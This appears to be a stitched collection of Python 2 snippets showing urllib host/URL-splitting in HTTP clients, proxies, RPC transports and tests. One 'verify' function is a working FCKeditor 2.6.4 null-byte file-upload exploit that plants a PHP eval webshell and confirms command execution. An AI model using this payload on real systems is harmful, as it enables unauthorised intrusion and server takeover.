def open_http(self, url, data=None): """Use HTTP protocol.""" import httplib user_passwd = None if type(url) is type(""): host, selector = splithost(url) if host: user_passwd, host = splituser(host) host = unquote(host) realhost = host else: host, selector = url urltype, rest = splittype(selector) url = rest user_passwd = None if string.lower(urltype) != 'http': realhost = None else: realhost, rest = splithost(rest) if realhost: user_passwd, realhost = splituser(realhost) if user_passwd: selector = "%s://%s%s" % (urltype, realhost, rest) #print "proxy via http:", host, selector if not host: raise IOError, ('http error', 'no host given') if user_passwd: import base64 auth = string.strip(base64.encodestring(user_passwd)) else: auth = None h = httplib.HTTP(host) if data is not None: h.putrequest('POST', selector) h.putheader('Content-type', 'application/x-www-form-urlencoded') h.putheader('Content-length', '%d' % len(data)) else: h.putrequest('GET', selector) for cookie in self.cookies.items(): h.putheader('Cookie', '%s=%s;' % cookie) if auth: h.putheader('Authorization', 'Basic %s' % auth) if realhost: h.putheader('Host', realhost) for args in self.addheaders: apply(h.putheader, args) h.endheaders() if data is not None: h.send(data + '\r\n') errcode, errmsg, headers = h.getreply() if headers and headers.has_key('set-cookie'): cookies = headers.getallmatchingheaders('set-cookie') for cookie in cookies: self.cookies.load(cookie) fp = h.getfile() if errcode == 200: return addinfourl(fp, headers, "http:" + url) else: if data is None: return self.http_error(url, fp, errcode, errmsg, headers) else: return self.http_error(url, fp, errcode, errmsg, headers, data)
def open_http(url, data=None): """Use HTTP protocol.""" import httplib user_passwd = None proxy_passwd= None if isinstance(url, str): host, selector = urllib.splithost(url) if host: user_passwd, host = urllib.splituser(host) host = urllib.unquote(host) realhost = host else: host, selector = url # check whether the proxy contains authorization information proxy_passwd, host = urllib.splituser(host) # now we proceed with the url we want to obtain urltype, rest = urllib.splittype(selector) url = rest user_passwd = None if urltype.lower() != 'http': realhost = None else: realhost, rest = urllib.splithost(rest) if realhost: user_passwd, realhost = urllib.splituser(realhost) if user_passwd: selector = "%s://%s%s" % (urltype, realhost, rest) if urllib.proxy_bypass(realhost): host = realhost #print "proxy via http:", host, selector if not host: raise IOError, ('http error', 'no host given') if proxy_passwd: import base64 proxy_auth = base64.b64encode(proxy_passwd).strip() else: proxy_auth = None if user_passwd: import base64 auth = base64.b64encode(user_passwd).strip() else: auth = None c = FakeHTTPConnection(host) if data is not None: c.putrequest('POST', selector) c.putheader('Content-Type', 'application/x-www-form-urlencoded') c.putheader('Content-Length', '%d' % len(data)) else: c.putrequest('GET', selector) if proxy_auth: c.putheader('Proxy-Authorization', 'Basic %s' % proxy_auth) if auth: c.putheader('Authorization', 'Basic %s' % auth) if realhost: c.putheader('Host', realhost) for args in urllib.URLopener().addheaders: c.putheader(*args) c.endheaders() return c
def open_https(self, url, data=None, ssl_context=None): if ssl_context is not None and isinstance(ssl_context, SSL.Context): self.ctx = ssl_context else: self.ctx = SSL.Context(DEFAULT_PROTOCOL) user_passwd = None if isinstance(url, basestring): host, selector = urllib.splithost(url) if host: user_passwd, host = urllib.splituser(host) host = urllib.unquote(host) realhost = host else: host, selector = url urltype, rest = urllib.splittype(selector) url = rest user_passwd = None if urltype.lower() != 'http': realhost = None else: realhost, rest = urllib.splithost(rest) if realhost: user_passwd, realhost = urllib.splituser(realhost) if user_passwd: selector = "%s://%s%s" % (urltype, realhost, rest) # print("proxy via http:", host, selector) if not host: raise IOError('http error', 'no host given') if user_passwd: import base64 auth = base64.encodestring(user_passwd).strip() else: auth = None # Start here! h = httpslib.HTTPSConnection(host=host, ssl_context=self.ctx) # h.set_debuglevel(1) # Stop here! if data is not None: h.putrequest('POST', selector) h.putheader('Content-type', 'application/x-www-form-urlencoded') h.putheader('Content-length', '%d' % len(data)) else: h.putrequest('GET', selector) if auth: h.putheader('Authorization', 'Basic %s' % auth) for args in self.addheaders: apply(h.putheader, args) h.endheaders() if data is not None: h.send(data + '\r\n') # Here again! resp = h.getresponse() fp = resp.fp return urllib.addinfourl(fp, resp.msg, "https:" + url)
def flushsquid(): prefix = request.query.jsoncallback RawUrls = request.query.urls urlstype = int(request.query.urlstype) LogKeyName = "key"+str(request.query.key) if RawUrls.strip() == "": DataDict = {'success':'0','text':'请输入需要刷新的URLS列表!'} return prefix+"("+ujson.encode(DataDict)+")" else: RawUrls = RawUrls.strip(",") UrlsList = RawUrls.split(",") QuitFlag = False PathList = [] #判断收到的URL是否是同域名下同类型的URL(同是文件或目录) FirstUrl = UrlsList[0] proto,rest = urllib.splittype(FirstUrl) DomainName,path = urllib.splithost(rest) if "." in path: UrlType = "file" else: UrlType = "dir" for url in UrlsList: proto,rest = urllib.splittype(url) Thost,Tpath = urllib.splithost(rest) if "." in Tpath: TUrlType = "file" else: TUrlType = "dir" if DomainName != Thost or UrlType != TUrlType: QuitFlag = True break else: PathList.append(Tpath) if QuitFlag == False: try: #调用刷新类 PurgeCacheObj = exeCachePurge(UrlType,PathList,DomainName,LogKeyName) PurgeCacheObj.start() except Exception,e: DataDict = {'success':'0','text':'%s'%e} else: DataDict = {'success':'1'}
def open_http(self, url): """Use HTTP protocol.""" if isinstance(url, str): host, selector = urllib.splithost(url) if host: user_passwd, host = urllib.splituser(host) host = urllib.unquote(host) realhost = host else: host, selector = url urltype, rest = urllib.splittype(selector) url = rest user_passwd = None if urltype.lower() != "http": realhost = None else: realhost, rest = splithost(rest) if realhost: user_passwd, realhost = splituser(realhost) if user_passwd: selector = "%s://%s%s" % (urltype, realhost, rest) if proxy_bypass(realhost): host = realhost if not host: return -2 h = httplib.HTTP(host) h.putrequest("GET", selector) if realhost: h.putheader("Host", realhost) for args in self.addheaders: h.putheader(*args) h.endheaders() errcode, errmsg, headers = h.getreply() return errcode
def __init__(self, ec2_url, ec2_region, ec2_access_key, ec2_secret_key, vpc=None, storage_path=None, request_floating_ip=False): self._url = ec2_url self._region_name = ec2_region self._access_key = ec2_access_key self._secret_key = ec2_secret_key self._vpc = vpc self.request_floating_ip = request_floating_ip # read all parameters from url proto, opaqueurl = urllib.splittype(ec2_url) self._host, self._ec2path = urllib.splithost(opaqueurl) self._ec2host, port = urllib.splitport(self._host) if port: port = int(port) self._ec2port = port if proto == "https": self._secure = True else: self._secure = False # will be initialized upon first connect self._ec2_connection = None self._vpc_connection = None self._vpc_id = None self._region = None self._instances = {} self._cached_instances = [] self._images = None
def request(self, host, handler, request_body, verbose=0): type, r_type = splittype(self.proxy) if 'http' in type: phost, XXX = splithost(r_type) else: phost = self.proxy puser_pass = None if '@' in phost: user_pass, phost = phost.split('@', 1) if ':' in user_pass: user, password = user_pass.split(':', 1) puser_pass = base64.encodestring('%s:%s' % (unquote(user),unquote(password))).strip() urlopener = urllib.FancyURLopener({'http':'http://%s'%phost}) if not puser_pass: urlopener.addheaders = [('User-agent', self.user_agent)] else: urlopener.addheaders = [('User-agent', self.user_agent),('Proxy-authorization', 'Basic ' + puser_pass)] host = unquote(host) f = urlopener.open("http://%s%s"%(host,handler), request_body) self.verbose = verbose return self.parse_response(f)
def do_request_(self, request): host = request.get_host() if not host: raise URLError('no host given') if request.has_data(): # POST data = request.get_data() if not request.has_header('Content-type'): request.add_unredirected_header( 'Content-type', 'application/x-www-form-urlencoded') if not request.has_header('Content-length'): request.add_unredirected_header( 'Content-length', '%d' % len(data)) scheme, sel = splittype(request.get_selector()) sel_host, sel_path = splithost(sel) if not request.has_header('Host'): request.add_unredirected_header('Host', sel_host or host) for name, value in self.parent.addheaders: name = name.capitalize() if not request.has_header(name): request.add_unredirected_header(name, value) return request
def test_empty_string_proxy_username(self): """ Yoram Hekma submitted a patch[0] that ensured that an empty string in the proxy username would not count as the user supplying a username. This test ensures that behavior is tested. [0] https://github.com/pulp/nectar/pull/47 """ kwargs = {'proxy_url': 'https://invalid-proxy.com', 'proxy_port': 1234, 'proxy_username': '', 'proxy_password': ''} proxy_host = urllib.splithost(urllib.splittype(kwargs['proxy_url'])[1])[0] cfg = config.DownloaderConfig(**kwargs) session = threaded.build_session(cfg) self.assertEqual(session.stream, True) self.assertFalse(hasattr(session.auth, 'proxy_username')) self.assertFalse(hasattr(session.auth, 'proxy_password')) # Since the user provided the empty string for the proxy username, the username and password # should be missing in the session proxies. self.assertEqual(session.proxies, {'http': 'https://%s:%d' % (proxy_host, kwargs['proxy_port']), 'https': 'https://%s:%d' % (proxy_host, kwargs['proxy_port'])})
def parse_callback_url(self, callback_url): proto, rest = urllib.splittype(callback_url) host, rest = urllib.splithost(rest) host, port = urllib.splitport(host) if not port: port = 443 return host, port
def test_build_session(self): kwargs = {'basic_auth_username': '******', 'basic_auth_password': '******', 'ssl_validation': False, 'ssl_client_cert_path': os.path.join(_find_data_directory(), 'pki/bogus/cert.pem'), 'ssl_client_key_path': os.path.join(_find_data_directory(), 'pki/bogus/key.pem'), 'proxy_url': 'https://invalid-proxy.com', 'proxy_port': 1234, 'proxy_username': '******', 'proxy_password': '******'} proxy_host = urllib.splithost(urllib.splittype(kwargs['proxy_url'])[1])[0] cfg = config.DownloaderConfig(**kwargs) session = threaded.build_session(cfg) self.assertEqual(session.stream, True) self.assertEqual(session.auth, (kwargs['basic_auth_username'], kwargs['basic_auth_password'])) self.assertEqual(session.cert, (kwargs['ssl_client_cert_path'], kwargs['ssl_client_key_path'])) self.assertEqual(session.proxies, {'http': 'https://%s:%s@%s:%d' % (kwargs['proxy_username'], kwargs['proxy_password'], proxy_host, kwargs['proxy_port']), 'https': 'http://%s:%s@%s:%d' % (kwargs['proxy_username'], kwargs['proxy_password'], proxy_host, kwargs['proxy_port'])})
def verify(self): url = self.target filename = "ice.gif" foldername = "ice.php%00.gif" connector = "editor/filemanager/connectors/php/connector.php"; proto, rest = urllib.splittype(url) host, rest = urllib.splithost(rest) payload = "-----------------------------265001916915724\r\n" payload += "Content-Disposition: form-data; name=\"NewFile\"; filename=\"ice.gif\"\r\n" payload += "Content-Type: image/jpeg\r\n\r\n" payload += 'GIF89a'+"\r\n"+'<?php eval($_POST[ice]) ?>'+"\n" payload += "-----------------------------265001916915724--\r\n" packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder="+foldername+" HTTP/1.0\r\n"; packet += "Host: "+ host +"\r\n" packet += "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n" packet += "Content-Length: "+ str(len(payload))+"\r\n" packet += "Connection: close\r\n\r\n" packet += payload webshell_url = url + '/uploadfile/file/ice.php' urllib2.urlopen(url, data=packet,timeout=5) request = urllib2.Request(webshell_url, data="e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);") response = urllib2.urlopen(request).read() if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response: self.result['status'] = True self.result['info'] = "目标存在fckeditor 2.6.4 %00截断任意文件上传漏洞, webshell: %s 密码ice" % webshell_url
def __init__(self, username=None, password=None, serverurl=None): self.username = username self.password = password self.verbose = False self.serverurl = serverurl if serverurl.startswith("http://"): type, uri = urllib.splittype(serverurl) host, path = urllib.splithost(uri) host, port = urllib.splitport(host) if port is None: port = 80 else: port = int(port) def get_connection(host=host, port=port): return httplib.HTTPConnection(host, port) self._get_connection = get_connection elif serverurl.startswith("unix://"): def get_connection(serverurl=serverurl): # we use 'localhost' here because domain names must be # < 64 chars (or we'd use the serverurl filename) conn = UnixStreamHTTPConnection("localhost") conn.socketfile = serverurl[7:] return conn self._get_connection = get_connection else: raise ValueError("Unknown protocol for serverurl %s" % serverurl)
def _add_proxy(session, config): if None in (config.proxy_url, config.proxy_port): return # Set session.proxies according to given url and port protocol, remainder = urllib.splittype(config.proxy_url) host, remainder = urllib.splithost(remainder) url = ':'.join((host, str(config.proxy_port))) if config.proxy_username: password_part = config.get('proxy_password', '') and ':%s' % config.proxy_password auth = config.proxy_username + password_part auth = urllib.quote(auth, safe=':') url = '@'.join((auth, url)) session.proxies['https'] = '://'.join((protocol, url)) session.proxies['http'] = '://'.join((protocol, url)) # Set session.auth if proxy username is specified if config.proxy_username is not None: proxy_password = config.get('proxy_password', '') if None in (config.basic_auth_username, config.basic_auth_password): # bz 1021662 - Proxy authentiation using username and password in session.proxies urls # does not setup correct headers in the http download request because of a bug in # urllib3. This is an alternate approach which sets up the headers correctly. session.auth = requests.auth.HTTPProxyAuth(config.proxy_username, proxy_password) else: # The approach mentioned above works well except when a basic user authentication is # used, along with the proxy authentication. Therefore, we define and use a custom class # which inherits AuthBase class provided by the requests library to add the headers # correctly. session.auth = HTTPBasicWithProxyAuth(config.basic_auth_username, config.basic_auth_password, config.proxy_username, proxy_password)
def compile(self): """Validate the user submitted url address at compile stage. The url address will be tested with the configured regex patterns loaded from :attr:`BaseHost.compiler_params`. Refer to :ref:`hwnetapi` for more details about the rules. """ if self.config['urlrule']: p = re.compile(self.config['urlrule']) if not p.match(self.config['remote_addr']): raise NetApiAddressRejected(compile_error=lazy_gettext( 'Address "%(url)s" does not match pattern "%(rule)s"', url=self.config['remote_addr'], rule=self.config['urlrule'] )) if self.config['iprule']: domain = urllib.splitport( urllib.splithost( urllib.splittype(self.config['remote_addr'])[1] )[0] )[0] # get ip from domain try: ipaddr = socket.gethostbyname(domain) except Exception: logger.exception( 'Could not get ip address for domain "%s".' % domain) ipaddr = '<invalid>' # ip not match, skip p = re.compile(self.config['iprule']) if not p.match(ipaddr): raise NetApiAddressRejected(compile_error=lazy_gettext( 'IP address "%(ip)s" does not match pattern "%(rule)s"', ip=ipaddr, rule=self.config['iprule'] ))
def __init__(self, uri, transport=None, encoding=None, verbose=0, version=None): import urllib if not version: version = config.version self.__version = version schema, uri = urllib.splittype(uri) if schema not in ('http', 'https', 'unix'): raise IOError('Unsupported JSON-RPC protocol.') if schema == 'unix': if not USE_UNIX_SOCKETS: # Don't like the "generic" Exception... raise UnixSocketMissing("Unix sockets not available.") self.__host = uri self.__handler = '/' else: self.__host, self.__handler = urllib.splithost(uri) if not self.__handler: # Not sure if this is in the JSON spec? # self.__handler = '/' self.__handler == '/' if transport is None: if schema == 'unix': transport = UnixTransport() elif schema == 'https': transport = SafeTransport() else: transport = Transport() self.__transport = transport self.__encoding = encoding self.__verbose = verbose
def request(self, method, url, body=None, headers={}): # Request is called before connect, so can interpret url and get # real host/port to be used to make CONNECT request to proxy proto, rest = urllib.splittype(url) if proto is None: raise ValueError, "unknown URL type: %s" % url # Get host host, rest = urllib.splithost(rest) # Try to get port host, port = urllib.splitport(host) # If port is not defined try to get from proto if port is None: try: port = self._ports[proto] except KeyError: raise ValueError, "unknown protocol for: %s" % url self._real_host = host self._real_port = int(port) httplib.HTTPConnection.request(self, method, rest, body, headers)
def start(self, destfile=None, destfd=None): urllib._urlopener = OLPCURLopener() self._info = urllib.urlopen(self._url) self._outf = None self._fname = None if destfd and not destfile: raise ValueError('Must provide destination file too when' ' specifying file descriptor') if destfile: self._suggested_fname = os.path.basename(destfile) self._fname = os.path.abspath(os.path.expanduser(destfile)) if destfd: # Use the user-supplied destination file descriptor self._outf = destfd else: self._outf = os.open(self._fname, os.O_RDWR | os.O_TRUNC | os.O_CREAT, 0644) else: fname = self._get_filename_from_headers(self._info.headers) self._suggested_fname = fname garbage_, path = urllib.splittype(self._url) garbage_, path = urllib.splithost(path or "") path, garbage_ = urllib.splitquery(path or "") path, garbage_ = urllib.splitattr(path or "") suffix = os.path.splitext(path)[1] (self._outf, self._fname) = tempfile.mkstemp(suffix=suffix, dir=self._destdir) fcntl.fcntl(self._info.fp.fileno(), fcntl.F_SETFD, os.O_NDELAY) self._srcid = GObject.io_add_watch(self._info.fp.fileno(), GObject.IO_IN | GObject.IO_ERR, self._read_next_chunk)
def stripy_article_list(self, section_name, page_num): try: self.cur_page = page_num article_list = [] if page_num == 0: url = self.section_url_map[section_name] else: url = self.section_url_map[section_name][0:-8] + '_' + str(self.cur_page) + '.shtml' contentHtml = self.session.get(url, stream=True) encoding = chardet.detect(contentHtml.content)['encoding'] if contentHtml.status_code == requests.codes.ok: pattern = r'<a href=\'(.*?)\'.*?<font class=a19_articlelist>(.*?)</a>.*?>(.*?)</td>' for mtFind in re.finditer(pattern, contentHtml.content, re.S): if mtFind.groups()[0][0:4] == "http": article_url = mtFind.groups()[0] else: proto,rest = urllib.splittype( self.section_url_map[section_name]) article_url = proto + "://" + urllib.splithost( rest )[0] + "/" + mtFind.groups()[0].strip("../") public_time = self.strip_tags(mtFind.groups()[2]) title = mtFind.groups()[1].decode(encoding) item = article_item(article_url, title, public_time) item.set_section_name(section_name) article_list.append(item) else: self.logger.error(u'没有获取到文章列表 ' + str(page_num) ) except BaseException, e: self.logger.error(str(e))
def __init__(self, url, config = Config): proto, uri = urllib.splittype(url) # apply some defaults if uri[0:2] != '//': if proto != None: uri = proto + ':' + uri uri = '//' + uri proto = 'http' host, path = urllib.splithost(uri) try: int(host) host = 'localhost:' + host except: pass if not path: path = '/' if proto not in ('http', 'https', 'httpg'): raise IOError, "unsupported SOAP protocol" if proto == 'httpg' and not config.GSIclient: raise AttributeError, \ "GSI client not supported by this Python installation" if proto == 'https' and not config.SSLclient: raise AttributeError, \ "SSL client not supported by this Python installation" self.user,host = urllib.splituser(host) self.proto = proto self.host = host self.path = path
def do_open(self, http_class, req): host = req.get_host() if not host: raise URLError('no host given') h = http_class(host) # will parse host:port if req.has_data(): data = req.get_data() h.putrequest('POST', req.get_selector()) if not req.headers.has_key('Content-type'): h.putheader('Content-type', 'application/x-www-form-urlencoded') if not req.headers.has_key('Content-length'): h.putheader('Content-length', '%d' % len(data)) else: h.putrequest('GET', req.get_selector()) scheme, sel = splittype(req.get_selector()) sel_host, sel_path = splithost(sel) h.putheader('Host', sel_host or host) for args in self.parent.addheaders: h.putheader(*args) for k, v in req.headers.items(): h.putheader(k, v) # httplib will attempt to connect() here. be prepared # to convert a socket error to a URLError. try: h.endheaders() except socket.error, err: raise URLError(err)
def __init__(self, uri, transport=None, encoding=None, verbose=0, auth_username=None, auth_password=None): # establish a "logical" server connection # get the url import urllib type, uri = urllib.splittype(uri) if type: if type not in ("http", "https"): raise IOError, "unsupported XML-RPC protocol" self.__host, self.__handler = urllib.splithost(uri) if not self.__handler: self.__handler = "/RPC2" if transport is None: if type == "https": transport = SafeTransport() else: transport = Transport() else: self.__host = uri transport = RawTransport() self.__transport = transport self.__encoding = encoding self.__verbose = verbose self.__username = auth_username self.__password = auth_password
def request(self, method, url, body=None, headers={}): """ Make CONNECT request to proxy. """ proto, rest = urllib.splittype(url) if proto is None: raise ValueError, "unknown URL type: %s" % url # Get hostname. host = urllib.splithost(rest)[0] # Get port of one host, port = urllib.splitport(host) # When no port use hardcoded. if port is None: try: port = self._ports[proto] except KeyError: raise ValueError, "unknown protocol for: %s" % url # Remember. self._real_host = host self._real_port = port # Remember auth if there. if headers.has_key("Proxy-Authorization"): self._proxy_authorization = headers["Proxy-Authorization"] del headers["Proxy-Authorization"] else: self._proxy_authorization = None httplib.HTTPConnection.request(self, method, url, body, headers)
def __init__(self, url, _client=None): Transport.__init__(self, url) (scheme, _, loc, _, _) = urlparse.urlsplit(url) assert scheme == "git" hostport, self._path = urllib.splithost(loc) (self._host, self._port) = urllib.splitnport(hostport, git.protocol.TCP_GIT_PORT) self._client = _client
def init_server(self, myuri): #Borrowed the following from rpcServer.py #rpclib.Server.__init__(self, uri, transport=self.rpc_args['transport'], encoding=self.rpc_args['encoding'], verbose=self.rpc_args['verbose'],\ # proxy=self.rpc_args['proxy'], username=self.rpc_args['username'],\ # password=self.rpc_args['password'], refreshCallback=self.rpc_args['refreshCallback'],\ # progressCallback=self.rpc_args['progressCallback']) self._uri = myuri typ, uri = urllib.splittype(self._uri) typ = typ.lower() if typ not in ("http", "https"): raise InvalidRedirectionError( "Redirected to unsupported protocol %s" % typ) self._host, self._handler = urllib.splithost(uri) self._orig_handler = self._handler self._type = typ if not self._handler: self._handler = self.rpc_handler self._allow_redirect = 1 del self._transport self._transport = self.default_transport(typ, self._proxy, self._username, self._password) self.set_progress_callback(self._progressCallback) self.set_refresh_callback(self._refreshCallback) self.set_buffer_size(self._bufferSize) self.setlang(self._lang) if self._trusted_cert_files != [] and \ hasattr(self._transport, "add_trusted_cert"): for certfile in self._trusted_cert_files: self._transport.add_trusted_cert(certfile)
def __init__(self, uri, transport=None, encoding=None, verbose=0, allow_none=0, use_datetime=0): # establish a "logical" server connection if DEBUG: print "[Proxy.__init__(%s, %s, %s, %s, %s, %s)]" % \ (uri, transport, encoding, verbose, allow_none, use_datetime) # get the url import urllib type, host = urllib.splittype(uri) if type.lower() != "gbx": try: # Parameter use_datetime is available since Python 2.5 xmlrpclib.ServerProxy.__init__(self, uri, transport, encoding, verbose, allow_none, use_datetime) except TypeError: xmlrpclib.ServerProxy.__init__(self, uri, transport, encoding, verbose, allow_none) else: self._ServerProxy__host, self._ServerProxy__handler = urllib.splithost(host) if not self._ServerProxy__handler: self._ServerProxy__handler = "/RPC2" self._ServerProxy__transport = transport or Transport(use_datetime) self._ServerProxy__encoding = encoding self._ServerProxy__verbose = verbose if DEBUG: print type, self._ServerProxy__host, \ self._ServerProxy__handler, self._ServerProxy__transport, \ self._ServerProxy__encoding, self._ServerProxy__verbose
def _get_real_authority(self): """ Return the authority specification of the originally requested URL. The return value is a string of the form <host>:<port>. """ url = self._proxy_request.get_selector() proto, rest = urllib.splittype(url) if proto is None: raise ValueError("unknown URL type: %s" % url) # Get the host and port specification host, rest = urllib.splithost(rest) host, port = urllib.splitport(host) # If port is not defined, then try to get it from the protocol. if port is None: try: port = self._ports[proto] except KeyError: raise ValueError("unknown protocol for: %s" % url) return '%s:%d' % (host, port)
def __init__(self, url, progress_cb=None, auth=None, config=None, client_string_func=None, open_tmp_file_func=None): self.url = url (type, opaque) = urllib.splittype(url) assert type in ("svn", "svn+ssh") (host, path) = urllib.splithost(opaque) self._progress_cb = progress_cb self._auth = auth self._config = config self._client_string_func = client_string_func # open_tmp_file_func is ignored, as it is not needed for svn:// if type == "svn": (recv_func, send_func) = self._connect(host) else: (recv_func, send_func) = self._connect_ssh(host) super(SVNClient, self).__init__(recv_func, send_func) (min_version, max_version, _, self._server_capabilities) = self._recv_greeting() self.send_msg([max_version, [literal(x) for x in CAPABILITIES if x in self._server_capabilities], self.url]) (self._server_mechanisms, mech_arg) = self._unpack() if self._server_mechanisms != []: # FIXME: Support other mechanisms as well self.send_msg([literal("ANONYMOUS"), [base64.b64encode("anonymous@%s" % socket.gethostname())]]) self.recv_msg() msg = self._unpack() if len(msg) > 2: self._server_capabilities += msg[2] (self._uuid, self._root_url) = msg[0:2] self.busy = False
def do_request_(self, request): host = request.get_host() if not host: raise URLError("no host given") if request.has_data(): # POST data = request.get_data() if not request.has_header("Content-type"): request.add_unredirected_header("Content-type", "application/x-www-form-urlencoded") if not request.has_header("Content-length"): request.add_unredirected_header("Content-length", "%d" % len(data)) sel_host = host if request.has_proxy(): scheme, sel = splittype(request.get_selector()) sel_host, sel_path = splithost(sel) if not request.has_header("Host"): request.add_unredirected_header("Host", sel_host) for name, value in self.parent.addheaders: name = name.capitalize() if not request.has_header(name): request.add_unredirected_header(name, value) return request
def processRequest(self,method=None,url=None,data="",headers={}): conf = desktop.Config() if not conf['proxy']: self.proxy_host = None self.proxy_port = None else: self.proxy_host = conf['proxy']['proxy'] self.proxy_port = conf['proxy']['proxy_port'] socket.setdefaulttimeout(self.http_timeout) (protocol,resource) = urllib.splittype(url) (hostport,path) = urllib.splithost(resource) connexion = None if protocol.lower() == "http": (host,port) = urllib.splitnport(hostport, 80) import httplib if self.proxy_host != None and self.proxy_port != None : connexion = HTTPConnection(self.proxy_host, self.proxy_port, timeout=self.http_timeout) path = url else: connexion = HTTPConnection(host, port, timeout=self.http_timeout) elif protocol.lower() == "https" : (host,port) = urllib.splitnport(hostport, 443) connexion = HTTPSConnection(host, port) if self.proxy_host != None and self.proxy_port != None : connexion.http_proxy = [self.proxy_host, self.proxy_port] else: assert False, "Unhandled Protocol, please use HTTP or HTTPS" connexion.connect() connexion.request(method, path, body=data, headers=headers) response = connexion.getresponse() return response
def get_domian(url): if not url.startswith('http'): url = 'http://' + url proto, rest = urllib.splittype(url) res, rest = urllib.splithost(rest) return None if not res else res
def __init__(self, url, method, params): Assert(method == 'GET') netloc, path = splithost(url) if not netloc: raise IOError, ('ftp error', 'no host given') host, port = splitport(netloc) user, host = splituser(host) if user: user, passwd = splitpasswd(user) else: passwd = None host = socket.gethostbyname(host) if port: try: port = string.atoi(port) except string.atoi_error: raise IOError, ('ftp error', 'bad port') else: port = ftplib.FTP_PORT path, attrs = splitattr(path) self.url = "ftp://%s%s" % (netloc, path) dirs = string.splitfields(path, '/') dirs, file = dirs[:-1], dirs[-1] self.content_length = None if not file: self.content_type, self.content_encoding = None, None type = 'd' else: self.content_type, self.content_encoding = app.guess_type(file) if self.content_encoding: type = 'i' elif self.content_type and self.content_type[:5] == 'text/': type = 'a' elif file[-1] == '/': type = 'd' else: type = 'i' if dirs and not dirs[0]: dirs = dirs[1:] key = (user, host, port, string.joinfields(dirs, '/')) self.debuglevel = None try: if not ftpcache.has_key(key): ftpcache[key] = [] for attr in attrs: [attr, value] = map(string.lower, splitvalue(attr)) if attr == 'type' and value in ('a', 'i', 'd'): type = value elif attr == 'debug': try: self.debuglevel = string.atoi(value) except string.atoi_error: pass candidates = ftpcache[key] for cand in candidates: if not cand.busy(): break else: cand = ftpwrapper(user, passwd, host, port, dirs, self.debuglevel) candidates.append(cand) # XXX Ought to clean the cache every once in a while self.cand = cand self.sock, self.isdir = cand.retrfile(file, type) self.content_length = cand.content_length except ftplib.all_errors, msg: raise IOError, ('ftp error', msg)
def do_open(self, http_class, req): data = req.get_data() v_files = [] v_vars = [] # mapping object (dict) if req.has_data() and type(data) != str: if hasattr(data, 'items'): data = data.items() else: try: if len(data) and not isinstance(data[0], tuple): raise TypeError except TypeError: ty, va, tb = sys.exc_info() raise TypeError, "not a valid non-string sequence or mapping object", tb for (k, v) in data: # if fd is provided with a filename if isinstance(v, dict): if not v.has_key('fd'): raise TypeError( "if value is dict, it must have keys 'fd' and 'filename" ) if not v.has_key('filename'): raise TypeError( "if value is dict, it must have keys 'fd' and 'filename" ) v_files.append((k, v)) elif hasattr(v, 'read'): v_files.append((k, v)) else: v_vars.append((k, v)) # no file ? convert to string if len(v_vars) > 0 and len(v_files) == 0: data = urllib.urlencode(v_vars) v_files = [] v_vars = [] host = req.get_host() if not host: raise urllib2.URLError('no host given') h = http_class(host) # will parse host:port if req.has_data(): h.putrequest(req.get_method(), req.get_selector()) if not 'Content-type' in req.headers: if len(v_files) > 0: boundary = mimetools.choose_boundary() l = send_data(v_vars, v_files, boundary) h.putheader('Content-Type', 'multipart/form-data; boundary=%s' % boundary) h.putheader('Content-length', str(l)) else: h.putheader('Content-type', 'application/x-www-form-urlencoded') if not 'Content-length' in req.headers: h.putheader('Content-length', '%d' % len(data)) else: h.putrequest(req.get_method(), req.get_selector()) scheme, sel = urllib.splittype(req.get_selector()) sel_host, sel_path = urllib.splithost(sel) h.putheader('Host', sel_host or host) for name, value in self.parent.addheaders: name = name.capitalize() if name not in req.headers: h.putheader(name, value) for k, v in req.headers.items(): h.putheader(k, v) # httplib will attempt to connect() here. be prepared # to convert a socket error to a URLError. try: h.endheaders() except socket.error, err: raise urllib2.URLError(err)
def url_www(url): #URL地址中提取网址 http://www.bizschool.cn/plus/90sec.php www.bizschool.cn proto, rest = urllib.splittype(url) host, rest = urllib.splithost(rest) return host
def get_host(self): if self.host is None: self.host, self.__r_host = splithost(self.__r_type) if self.host: self.host = unquote(self.host) return self.host
# searchinput=browser.find_element_by_css_selector('#kw') # searchinput.send_keys(msgstring) # searchinput.send_keys(Keys.DOWN) # time.sleep(2) browserquit() browserquit() browserquit() url = urlinfo['url'] classtext = urlinfo['classtext'] classtext = classtext.replace("[", "") classtext = classtext.replace("]", "") classtext = classtext.replace("\n", "") protocol, s1 = urllib.splittype(url) host, s2 = urllib.splithost(s1) host, port = urllib.splitport(host) print('host') print(host) print(classtext) print(type(classtext)) # 浏览器设置 service_args = [] dcap = {} #从USER_AGENTS列表中随机选一个浏览器头,伪装浏览器 uainfo = generate_user_agent(os=('mac', 'win')) print(type(uainfo))
def testAdd(self, filepath, urlDic, root): config = IndexWriterConfig(Version.LUCENE_CURRENT, self.getAnalyzer()) config.setOpenMode(IndexWriterConfig.OpenMode.CREATE_OR_APPEND) writer = IndexWriter(self.dir, config) t1 = FieldType() t1.setIndexed(False) t1.setStored(True) t1.setTokenized(False) t2 = FieldType() t2.setIndexed(True) t2.setStored(False) t2.setTokenized(True) t2.setIndexOptions(FieldInfo.IndexOptions.DOCS_AND_FREQS_AND_POSITIONS) t3 = FieldType() t3.setIndexed(True) t3.setStored(True) t3.setTokenized(False) path = os.path.join(root, filepath) url = urlDic[filepath] proto, rest = urllib.splittype(url) site, rest = urllib.splithost(rest) file = open(path) contents = file.read() file.close() soup = BeautifulSoup(contents, features='html.parser') title = soup.title.string title = unicode(title).encode('utf-8') title = title.replace("\n", '') contents = soup.get_text().encode('utf-8') seg_list = jieba.cut(contents) contents = " ".join(seg_list) doc = Document() doc.add(Field("name", filepath, t1)) doc.add(Field("path", path, t1)) doc.add(Field("title", title, t1)) doc.add(Field("url", url, t1)) doc.add(Field("site", site, t3)) if len(contents) > 0: doc.add(Field("contents", contents, t2)) else: print "warning: no content in %s" % filepath #True,建立新索引,False,建立增量索引 # file = open(filepath) # contents = unicode(file.read(), 'gbk') # file.close() # doc = Document() # doc.add(Field("name", os.path.basename(filepath), # Field.Store.YES, # Field.Index.NOT_ANALYZED)) # doc.add(Field("path", filepath, # Field.Store.YES, # Field.Index.NOT_ANALYZED)) # if len(contents) > 0: # title = self.getTxtAttribute(contents, 'Title') # author = self.getTxtAttribute(contents, 'Author') # language = self.getTxtAttribute(contents, 'Language') # doc.add(Field("Title", title, # Field.Store.YES, # Field.Index.ANALYZED)) # 